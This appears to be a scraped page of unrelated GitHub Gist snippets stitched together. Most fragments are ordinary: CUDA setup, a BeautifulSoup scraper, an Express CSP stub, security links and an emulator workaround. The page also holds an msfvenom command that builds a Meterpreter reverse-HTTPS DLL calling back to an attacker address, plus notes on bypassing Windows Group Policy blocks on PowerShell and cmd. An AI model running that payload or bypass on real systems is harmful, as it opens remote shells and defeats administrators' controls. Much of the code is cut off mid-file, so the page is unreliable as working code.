Step 2: Generate and Obfuscate a Meterpreter DLL
# Generate a new Meterpreter DLL payload
msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=<YOUR ATTACKER IP ADDRESS> LPORT=443 -o meterpreter.dll
- Install CUDA Toolkit -> you should install the CUDA version that PyTorch supports for example at this time, Version CUDA 12.4 is the latest.
navigate to https://developer.nvidia.com/cuda-12-4-0-download-archive download and install the CUDA Toolkit version
- Check that CUDA Toolkit is installed > issue
nvcc --version
and observe from output that the installed cuda version is detected
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from bs4 import BeautifulSoup | |
import csv | |
def extract_data_from_html(html_path): | |
with open(html_path, 'r', encoding='utf-8') as file: | |
html_content = file.read() | |
soup = BeautifulSoup(html_content, 'html.parser') | |
extracted_data = [] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const express = require('express'); | |
const helmet = require('helmet'); | |
const app = express(); | |
const PORT = 3000; | |
// Using Helmet to set CSP | |
// app.use(helmet()); | |
// app.use(helmet.contentSecurityPolicy({ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.cyberciti.biz/security/howto-linux-hard-disk-encryption-with-luks-cryptsetup-command/ |
IAM
https://aws.amazon.com/architecture/security-identity-compliance/
https://docs.aws.amazon.com/IAM/latest/UserGuide/introduction.html
https://aws.amazon.com/architecture/security-identity-compliance/
https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html
video: https://www.youtube.com/watch?v=xp8ufidc514
Genymotion cannot start android emulator - shows the error "The VirtualBox DHCP server has not assigned an IP address to the virtual device"
Workaround:
- on your virtualbox, select and start the created android emulator vm
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Local Group Policy blocks powershell | |
## Windows Setting > Security Settings > Software Restriction Policies > Additional Rules > PowerShell.EXE (Type Hash, Disallowed) | |
copy system32 powershell to desktop | |
Set /p comm=cmd~ | |
cmd~echo >> C:\path\of\desktop\powershell.exe | |
# 'Prevent access to command prompt' bypass (refer as runcmd.bat) | |
@echo off | |
:a | |
Set /p comm=cmd~ |
#!/bin/bash
#mkdir tools dir
mkdir ~/Tools
mkdir ~/Wordlists
#sublime
NewerOlder